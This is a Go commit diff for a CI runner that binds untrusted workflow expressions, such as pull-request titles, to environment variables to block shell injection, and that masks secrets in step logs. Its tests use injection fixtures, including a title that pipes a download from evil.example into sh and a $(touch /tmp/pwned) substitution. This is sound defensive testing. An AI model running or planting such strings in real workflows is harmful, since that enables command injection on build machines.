tenseleyflow/shithub / 24f1f57

+	EnvTaint  map[string]bool

+		return Value{Kind: KindString, S: v, Tainted: ctx.EnvTaint[path[1]]}, nil

+func TestEval_EnvTaintPropagates(t *testing.T) {

+	t.Parallel()

+	ctx := defaultContext()

+	ctx.Env["TITLE"] = "hello"

+	ctx.EnvTaint = map[string]bool{"TITLE": true}

+	v, err := evalString(t, `env.TITLE`, ctx)

+	if err != nil {

+		t.Fatalf("Eval: %v", err)

+	}

+	if !v.Tainted {

+		t.Fatal("env values resolved from tainted expressions must remain tainted")

+	}

+}

+

+       r.head_sha, r.head_ref, r.event, r.event_payload

+       r.head_sha, r.head_ref, r.event, r.event_payload

+	EventPayload    []byte

+		&i.EventPayload,

+	EventPayload   map[string]any    `json:"event_payload"`

+	"encoding/json"

+

+	"github.com/tenseleyFlow/shithub/internal/actions/expr"

+	runnerexec "github.com/tenseleyFlow/shithub/internal/runner/exec"

+	"github.com/tenseleyFlow/shithub/internal/runner/scrub"

+	MaskValues       []string

+	writer := d.newStepLogWriter(ctx, job.ID, step.ID, job.MaskValues)

+	rendered, err := runnerexec.RenderStep(runnerexec.StepInput{

+		Run:     step.Run,

+		JobEnv:  job.Env,

+		StepEnv: step.Env,

+		Context: expressionContext(job),

+	})

+	if err != nil {

+		return nil, fmt.Errorf("runner engine: render step %q: %w", stepLabel(step), err)

+	}

+	env, err := validateEnv(rendered.Env)

+	args = append(args, image, "bash", "-c", rendered.Run)

+func expressionContext(job Job) expr.Context {

+	event := job.EventPayload

+	if len(event) == 0 && strings.TrimSpace(job.Event) != "" && json.Valid([]byte(job.Event)) {

+		_ = json.Unmarshal([]byte(job.Event), &event)

+	}

+	return expr.Context{

+		Shithub: expr.ShithubContext{

+			Event: event,

+			RunID: fmt.Sprintf("%d", job.RunID),

+			SHA:   job.HeadSHA,

+			Ref:   job.HeadRef,

+		},

+		Untrusted: expr.DefaultUntrusted(),

+	}

+}

+

+func (d *Docker) newStepLogWriter(ctx context.Context, jobID, stepID int64, jobMasks []string) *stepLogWriter {

+		masker:   scrub.New(append(append([]string{}, d.cfg.MaskValues...), jobMasks...)),

+	masker    *scrub.Scrubber

+		_ = w.flushMaskerLocked()

+	if w.masker != nil {

+		chunk = w.masker.Scrub(chunk)

+		if len(chunk) == 0 {

+			return nil

+		}

+	}

+	return w.emitChunkLocked(chunk)

+}

+

+func (w *stepLogWriter) flushMaskerLocked() error {

+	if w.masker == nil {

+		return nil

+	}

+	chunk := w.masker.Flush()

+	if len(chunk) == 0 {

+		return nil

+	}

+	return w.emitChunkLocked(chunk)

+}

+

+func (w *stepLogWriter) emitChunkLocked(chunk []byte) error {

+func validateEnv(env map[string]string) (map[string]string, error) {

+	out := make(map[string]string, len(env))

+	for k, v := range env {

+type secretLoggingRunner struct{}

+

+func (secretLoggingRunner) Run(_ context.Context, _ string, _ []string, stdout, _ io.Writer) error {

+	_, _ = stdout.Write([]byte("hun"))

+	_, _ = stdout.Write([]byte("ter2\n"))

+	return nil

+}

+

+func TestDockerExecute_RendersTaintedExpressionsThroughInputEnv(t *testing.T) {

+	t.Parallel()

+	rec := &recordingRunner{}

+	d := NewDocker(DockerConfig{

+		DefaultImage: "runner-image",

+		Network:      "bridge",

+		Memory:       "2g",

+		CPUs:         "2",

+		Runner:       rec,

+	})

+	malicious := `"; curl evil.example | sh #`

+	if _, err := d.Execute(t.Context(), Job{

+		ID:           1,

+		RunID:        2,

+		HeadSHA:      "abc",

+		HeadRef:      "refs/heads/trunk",

+		EventPayload: map[string]any{"pull_request": map[string]any{"title": malicious}},

+		WorkspaceDir: t.TempDir(),

+		Steps: []Step{{

+			Run: `echo "${{ shithub.event.pull_request.title }}"`,

+		}},

+	}); err != nil {

+		t.Fatalf("Execute: %v", err)

+	}

+	if got := rec.args[len(rec.args)-1]; got != `echo "${SHITHUB_INPUT_0}"` {

+		t.Fatalf("rendered command: %q", got)

+	}

+	if !containsArg(rec.args, "SHITHUB_INPUT_0="+malicious) {

+		t.Fatalf("input binding missing from args: %#v", rec.args)

+	}

+}

+

+func TestDockerExecute_ScrubsStepLogsAcrossChunkBoundary(t *testing.T) {

+	t.Parallel()

+	d := NewDocker(DockerConfig{

+		DefaultImage:  "runner-image",

+		Network:       "bridge",

+		Memory:        "2g",

+		CPUs:          "2",

+		LogChunkBytes: 3,

+		Runner:        secretLoggingRunner{},

+	})

+	logs, err := d.StreamLogs(t.Context(), 99)

+	if err != nil {

+		t.Fatalf("StreamLogs: %v", err)

+	}

+	if _, err := d.Execute(t.Context(), Job{

+		ID:           99,

+		WorkspaceDir: t.TempDir(),

+		MaskValues:   []string{"hunter2"},

+		Steps:        []Step{{ID: 123, Run: "echo secret"}},

+	}); err != nil {

+		t.Fatalf("Execute: %v", err)

+	}

+	var got string

+	for chunk := range logs {

+		got += string(chunk.Chunk)

+	}

+	if got != "***\n" {

+		t.Fatalf("logs: %q", got)

+	}

+}

+

+

+func containsArg(args []string, want string) bool {

+	for _, arg := range args {

+		if arg == want {

+			return true

+		}

+	}

+	return false

+}

+	EventPayload   map[string]any

+	MaskValues     []string

+// SPDX-License-Identifier: AGPL-3.0-or-later

+

+// Package exec renders workflow expressions into the shell/env surface used

+// by runner engines. It is deliberately separate from the Docker engine so

+// every future engine consumes the same taint boundary.

+package exec

+

+import (

+	"fmt"

+	"sort"

+	"strconv"

+	"strings"

+

+	"github.com/tenseleyFlow/shithub/internal/actions/expr"

+)

+

+const defaultBindingPrefix = "SHITHUB_INPUT_"

+

+type Bindings struct {

+	prefix string

+	next   int

+	env    map[string]string

+}

+

+func NewBindings(prefix string) *Bindings {

+	if strings.TrimSpace(prefix) == "" {

+		prefix = defaultBindingPrefix

+	}

+	return &Bindings{prefix: prefix, env: map[string]string{}}

+}

+

+func (b *Bindings) Add(value string) string {

+	name := b.prefix + strconv.Itoa(b.next)

+	b.next++

+	b.env[name] = value

+	return name

+}

+

+func (b *Bindings) Env() map[string]string {

+	out := make(map[string]string, len(b.env))

+	for k, v := range b.env {

+		out[k] = v

+	}

+	return out

+}

+

+type ResolvedText struct {

+	Text    string

+	Tainted bool

+}

+

+type RenderedStep struct {

+	Run      string

+	Env      map[string]string

+	EnvTaint map[string]bool

+}

+

+type StepInput struct {

+	Run     string

+	JobEnv  map[string]string

+	StepEnv map[string]string

+	Context expr.Context

+}

+

+func RenderStep(in StepInput) (RenderedStep, error) {

+	ctx := cloneContext(&in.Context)

+	bindings := NewBindings("")

+

+	env, taint, err := resolveEnv(in.JobEnv, &ctx)

+	if err != nil {

+		return RenderedStep{}, fmt.Errorf("render job env: %w", err)

+	}

+	mergeContextEnv(&ctx, env, taint)

+

+	stepEnv, stepTaint, err := resolveEnv(in.StepEnv, &ctx)

+	if err != nil {

+		return RenderedStep{}, fmt.Errorf("render step env: %w", err)

+	}

+	for k, v := range stepEnv {

+		env[k] = v

+		if stepTaint[k] {

+			taint[k] = true

+		} else {

+			delete(taint, k)

+		}

+	}

+	mergeContextEnv(&ctx, stepEnv, stepTaint)

+

+	run, err := RenderShell(in.Run, &ctx, bindings)

+	if err != nil {

+		return RenderedStep{}, err

+	}

+	for k, v := range bindings.Env() {

+		env[k] = v

+	}

+	return RenderedStep{Run: run, Env: env, EnvTaint: taint}, nil

+}

+

+func RenderShell(raw string, ctx *expr.Context, bindings *Bindings) (string, error) {

+	if bindings == nil {

+		bindings = NewBindings("")

+	}

+	var out strings.Builder

+	if err := walkExpressions(raw, func(literal, body string) error {

+		if body == "" {

+			out.WriteString(literal)

+			return nil

+		}

+		out.WriteString(literal)

+		v, err := eval(body, ctx)

+		if err != nil {

+			return err

+		}

+		if v.Tainted {

+			out.WriteString("${")

+			out.WriteString(bindings.Add(v.String()))

+			out.WriteString("}")

+			return nil

+		}

+		out.WriteString(v.String())

+		return nil

+	}); err != nil {

+		return "", err

+	}

+	return out.String(), nil

+}

+

+func ResolveText(raw string, ctx *expr.Context) (ResolvedText, error) {

+	var out strings.Builder

+	tainted := false

+	if err := walkExpressions(raw, func(literal, body string) error {

+		if body == "" {

+			out.WriteString(literal)

+			return nil

+		}

+		out.WriteString(literal)

+		v, err := eval(body, ctx)

+		if err != nil {

+			return err

+		}

+		if v.Tainted {

+			tainted = true

+		}

+		out.WriteString(v.String())

+		return nil

+	}); err != nil {

+		return ResolvedText{}, err

+	}

+	return ResolvedText{Text: out.String(), Tainted: tainted}, nil

+}

+

+func resolveEnv(raw map[string]string, ctx *expr.Context) (map[string]string, map[string]bool, error) {

+	out := make(map[string]string, len(raw))

+	taint := make(map[string]bool, len(raw))

+	for _, key := range sortedKeys(raw) {

+		if strings.HasPrefix(key, defaultBindingPrefix) {

+			return nil, nil, fmt.Errorf("%s uses reserved runner input prefix %s", key, defaultBindingPrefix)

+		}

+		v, err := ResolveText(raw[key], ctx)

+		if err != nil {

+			return nil, nil, fmt.Errorf("%s: %w", key, err)

+		}

+		out[key] = v.Text

+		if v.Tainted {

+			taint[key] = true

+		}

+	}

+	return out, taint, nil

+}

+

+func eval(body string, ctx *expr.Context) (expr.Value, error) {

+	if ctx == nil {

+		c := expr.Context{Untrusted: expr.DefaultUntrusted()}

+		ctx = &c

+	}

+	toks, err := expr.Lex(strings.TrimSpace(body))

+	if err != nil {

+		return expr.Value{}, err

+	}

+	ast, err := expr.Parse(toks)

+	if err != nil {

+		return expr.Value{}, err

+	}

+	return expr.Eval(ast, ctx)

+}

+

+func walkExpressions(raw string, fn func(literal, body string) error) error {

+	for {

+		start := strings.Index(raw, "${{")

+		if start < 0 {

+			return fn(raw, "")

+		}

+		end := strings.Index(raw[start+3:], "}}")

+		if end < 0 {

+			return fmt.Errorf("render expression: missing closing }}")

+		}

+		end += start + 3

+		if err := fn(raw[:start], raw[start+3:end]); err != nil {

+			return err

+		}

+		raw = raw[end+2:]

+	}

+}

+

+func cloneContext(ctx *expr.Context) expr.Context {

+	if ctx == nil {

+		return expr.Context{Untrusted: expr.DefaultUntrusted()}

+	}

+	out := *ctx

+	out.Secrets = cloneStringMap(ctx.Secrets)

+	out.Vars = cloneStringMap(ctx.Vars)

+	out.Env = cloneStringMap(ctx.Env)

+	out.EnvTaint = cloneBoolMap(ctx.EnvTaint)

+	out.Untrusted = cloneSet(ctx.Untrusted)

+	out.Shithub.Event = cloneAnyMap(ctx.Shithub.Event)

+	return out

+}

+

+func mergeContextEnv(ctx *expr.Context, env map[string]string, taint map[string]bool) {

+	if ctx.Env == nil {

+		ctx.Env = map[string]string{}

+	}

+	if ctx.EnvTaint == nil {

+		ctx.EnvTaint = map[string]bool{}

+	}

+	for k, v := range env {

+		ctx.Env[k] = v

+		if taint[k] {

+			ctx.EnvTaint[k] = true

+		} else {

+			delete(ctx.EnvTaint, k)

+		}

+	}

+}

+

+func sortedKeys(m map[string]string) []string {

+	keys := make([]string, 0, len(m))

+	for k := range m {

+		keys = append(keys, k)

+	}

+	sort.Strings(keys)

+	return keys

+}

+

+func cloneStringMap(in map[string]string) map[string]string {

+	if len(in) == 0 {

+		return nil

+	}

+	out := make(map[string]string, len(in))

+	for k, v := range in {

+		out[k] = v

+	}

+	return out

+}

+

+func cloneBoolMap(in map[string]bool) map[string]bool {

+	if len(in) == 0 {

+		return nil

+	}

+	out := make(map[string]bool, len(in))

+	for k, v := range in {

+		out[k] = v

+	}

+	return out

+}

+

+func cloneSet(in map[string]struct{}) map[string]struct{} {

+	if len(in) == 0 {

+		return expr.DefaultUntrusted()

+	}

+	out := make(map[string]struct{}, len(in))

+	for k, v := range in {

+		out[k] = v

+	}

+	return out

+}

+

+func cloneAnyMap(in map[string]any) map[string]any {

+	if len(in) == 0 {

+		return nil

+	}

+	out := make(map[string]any, len(in))

+	for k, v := range in {

+		out[k] = v

+	}

+	return out

+}

+// SPDX-License-Identifier: AGPL-3.0-or-later

+

+package exec

+

+import (

+	"reflect"

+	"testing"

+

+	"github.com/tenseleyFlow/shithub/internal/actions/expr"

+)

+

+func TestRenderShell_TaintedExpressionUsesEnvBinding(t *testing.T) {

+	t.Parallel()

+	ctx := expr.Context{

+		Shithub: expr.ShithubContext{

+			Event: map[string]any{

+				"pull_request": map[string]any{

+					"title": `"; curl evil.example | sh #`,

+				},

+			},

+		},

+		Untrusted: expr.DefaultUntrusted(),

+	}

+	bindings := NewBindings("")

+	got, err := RenderShell(`echo "${{ shithub.event.pull_request.title }}"`, &ctx, bindings)

+	if err != nil {

+		t.Fatalf("RenderShell: %v", err)

+	}

+	if got != `echo "${SHITHUB_INPUT_0}"` {

+		t.Fatalf("command:\ngot  %q\nwant %q", got, `echo "${SHITHUB_INPUT_0}"`)

+	}

+	if bindings.Env()["SHITHUB_INPUT_0"] != `"; curl evil.example | sh #` {

+		t.Fatalf("bindings: %#v", bindings.Env())

+	}

+}

+

+func TestRenderStep_EnvTaintPropagatesToRunExpressions(t *testing.T) {

+	t.Parallel()

+	ctx := expr.Context{

+		Shithub: expr.ShithubContext{

+			Event: map[string]any{"title": `$(touch /tmp/pwned)`},

+		},

+		Untrusted: expr.DefaultUntrusted(),

+	}

+	got, err := RenderStep(StepInput{

+		Context: ctx,

+		JobEnv: map[string]string{

+			"TITLE": "${{ shithub.event.title }}",

+		},

+		Run: "echo ${{ env.TITLE }}",

+	})

+	if err != nil {

+		t.Fatalf("RenderStep: %v", err)

+	}

+	if got.Env["TITLE"] != `$(touch /tmp/pwned)` || !got.EnvTaint["TITLE"] {

+		t.Fatalf("env/taint: env=%#v taint=%#v", got.Env, got.EnvTaint)

+	}

+	if got.Run != "echo ${SHITHUB_INPUT_0}" {

+		t.Fatalf("run: %q", got.Run)

+	}

+	if got.Env["SHITHUB_INPUT_0"] != `$(touch /tmp/pwned)` {

+		t.Fatalf("input binding: %#v", got.Env)

+	}

+}

+

+func TestRenderStep_ResolvesTrustedExpressionsInline(t *testing.T) {

+	t.Parallel()

+	got, err := RenderStep(StepInput{

+		Context: expr.Context{

+			Vars:      map[string]string{"TARGET": "world"},

+			Untrusted: expr.DefaultUntrusted(),

+		},

+		StepEnv: map[string]string{"GREETING": "hello ${{ vars.TARGET }}"},

+		Run:     "echo ${{ env.GREETING }}",

+	})

+	if err != nil {

+		t.Fatalf("RenderStep: %v", err)

+	}

+	if got.Run != "echo hello world" {

+		t.Fatalf("run: %q", got.Run)

+	}

+	wantEnv := map[string]string{"GREETING": "hello world"}

+	if !reflect.DeepEqual(got.Env, wantEnv) {

+		t.Fatalf("env:\ngot  %#v\nwant %#v", got.Env, wantEnv)

+	}

+}

+

+func TestRenderStep_StepEnvOverrideClearsJobEnvTaint(t *testing.T) {

+	t.Parallel()

+	ctx := expr.Context{

+		Shithub:   expr.ShithubContext{Event: map[string]any{"title": "bad"}},

+		Untrusted: expr.DefaultUntrusted(),

+	}

+	got, err := RenderStep(StepInput{

+		Context: ctx,

+		JobEnv: map[string]string{

+			"TITLE": "${{ shithub.event.title }}",

+		},

+		StepEnv: map[string]string{

+			"TITLE": "trusted",

+		},

+		Run: "echo ${{ env.TITLE }}",

+	})

+	if err != nil {

+		t.Fatalf("RenderStep: %v", err)

+	}

+	if got.EnvTaint["TITLE"] {

+		t.Fatalf("step override should clear taint: %#v", got.EnvTaint)

+	}

+	if got.Run != "echo trusted" {

+		t.Fatalf("run: %q", got.Run)

+	}

+}

+

+func TestRenderStep_RejectsReservedInputEnv(t *testing.T) {

+	t.Parallel()

+	_, err := RenderStep(StepInput{

+		JobEnv: map[string]string{"SHITHUB_INPUT_0": "collision"},

+		Run:    "true",

+	})

+	if err == nil {

+		t.Fatal("RenderStep returned nil error")

+	}

+}

+		EventPayload:   job.EventPayload,

+// SPDX-License-Identifier: AGPL-3.0-or-later

+

+// Package scrub masks configured secret values from runner log output.

+package scrub

+

+import (

+	"sort"

+	"strings"

+)

+

+const Mask = "***"

+

+type Scrubber struct {

+	values   []string

+	replacer *strings.Replacer

+	tail     string

+}

+

+func New(values []string) *Scrubber {

+	values = normalize(values)

+	if len(values) == 0 {

+		return &Scrubber{}

+	}

+	pairs := make([]string, 0, len(values)*2)

+	for _, v := range values {

+		pairs = append(pairs, v, Mask)

+	}

+	return &Scrubber{values: values, replacer: strings.NewReplacer(pairs...)}

+}

+

+func (s *Scrubber) Scrub(chunk []byte) []byte {

+	if s == nil || s.replacer == nil {

+		return append([]byte(nil), chunk...)

+	}

+	combined := s.tail + string(chunk)

+	keep := s.pendingSuffixLen(combined)

+	if keep == len(combined) {

+		s.tail = combined

+		return nil

+	}

+	emit := combined[:len(combined)-keep]

+	s.tail = combined[len(combined)-keep:]

+	return []byte(s.replacer.Replace(emit))

+}

+

+func (s *Scrubber) Flush() []byte {

+	if s == nil || s.tail == "" {

+		return nil

+	}

+	tail := s.tail

+	s.tail = ""

+	if s.replacer == nil {

+		return []byte(tail)

+	}

+	return []byte(s.replacer.Replace(tail))

+}

+

+func normalize(values []string) []string {

+	seen := map[string]struct{}{}

+	out := make([]string, 0, len(values))

+	for _, v := range values {

+		if v == "" {

+			continue

+		}

+		if _, ok := seen[v]; ok {

+			continue

+		}

+		seen[v] = struct{}{}

+		out = append(out, v)

+	}

+	sort.Slice(out, func(i, j int) bool {

+		return len(out[i]) > len(out[j])

+	})

+	return out

+}

+

+func (s *Scrubber) pendingSuffixLen(combined string) int {

+	keep := 0

+	for _, secret := range s.values {

+		max := len(secret) - 1

+		if max > len(combined) {

+			max = len(combined)

+		}

+		for n := max; n > keep; n-- {

+			if strings.HasSuffix(combined, secret[:n]) {

+				keep = n

+				break

+			}

+		}

+	}

+	return keep

+}

+// SPDX-License-Identifier: AGPL-3.0-or-later

+

+package scrub

+

+import "testing"

+

+func TestScrubber_MasksPlainAndMultilineSecrets(t *testing.T) {

+	t.Parallel()

+	s := New([]string{"hunter2", "line1\nline2"})

+	got := string(s.Scrub([]byte("token=hunter2\nkey=line1\nline2\n"))) + string(s.Flush())

+	want := "token=***\nkey=***\n"

+	if got != want {

+		t.Fatalf("scrubbed:\ngot  %q\nwant %q", got, want)

+	}

+}

+

+func TestScrubber_MasksAcrossChunkBoundary(t *testing.T) {

+	t.Parallel()

+	s := New([]string{"hunter2"})

+	got := string(s.Scrub([]byte("before hun")))

+	got += string(s.Scrub([]byte("ter2 after")))

+	got += string(s.Flush())

+	want := "before *** after"

+	if got != want {

+		t.Fatalf("scrubbed:\ngot  %q\nwant %q", got, want)

+	}

+}

+

+func TestScrubber_NoSecretsIsCopyingNoop(t *testing.T) {

+	t.Parallel()

+	s := New(nil)

+	in := []byte("hello")

+	got := s.Scrub(in)

+	in[0] = 'x'

+	if string(got) != "hello" {

+		t.Fatalf("scrubbed: %q", got)

+	}

+}

+	EventPayload   json.RawMessage `json:"event_payload"`

+			EventPayload:   rawJSONOrObject(job.EventPayload),

+			ID           int64          `json:"id"`

+			RunID        int64          `json:"run_id"`

+			RepoID       int64          `json:"repo_id"`

+			EventPayload map[string]any `json:"event_payload"`

+			Steps        []struct {

+	if resp.Job.EventPayload["ref"] != "refs/heads/trunk" {

+		t.Fatalf("event payload not returned to runner: %#v", resp.Job.EventPayload)

+	}